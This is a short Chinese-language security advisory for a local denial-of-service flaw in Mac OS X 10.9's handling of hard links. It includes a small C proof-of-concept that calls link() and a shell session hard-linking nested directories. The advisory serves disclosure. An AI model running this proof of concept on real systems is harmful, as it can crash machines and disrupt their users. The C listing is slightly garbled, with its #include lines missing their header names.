Apple Mac OS X硬链接本地拒绝服务漏洞

漏洞起因
设计错误
危险等级

影响系统
Apple MacOS X 10.9

不受影响系统

危害
本地攻击者可以利用漏洞可使系统崩溃。
CVSSv2:

攻击所需条件
攻击者必须访问Apple Mac OS X。

漏洞信息
Apple Mac OS X是一款苹果公司开发的操作系统。
Apple Mac OS X处理硬链接存在安全漏洞,允许本地攻击者利用漏洞可使系统崩溃,造成拒绝服务攻击。

测试方法
mac-cxs-XK:pochd XK$ cat test.c
#include
#include
void usage(const char* program)
{
const char* message = ” [src_dir] [target_dir]”;
fprintf(stderr, “%s%s\n”, program, message);
}
int main(int argc, char* argv[]) {
if (argc!=3) {
usage(argv[0]);
return 1;
}
int ret = link(argv[1],argv[2]);
fprintf(stderr,”link(3) return= %d\n”, ret);
return ret;
}
mac-cxs-XK:pochd XK$ gcc -o test test.c
mac-cxs-XK:pochd XK$ ls
test test.c
mac-cxs-XK:pochd XK$ mkdir DIR1
mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1
link(3) return= -1
mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2
mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2
link(3) return= 0
mac-cxs-XK:pochd XK$ cd DIR1
mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3
mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3
link(3) return= 0
mac-cxs-XK:DIR1 XK$ cd DIR2
mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4
mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4
link(3) return= -1
安全建议

厂商解决方案
目前没有详细解决方案提供:
http://www.apple.com/macosx/

漏洞提供者
Maksymilian Arciemowicz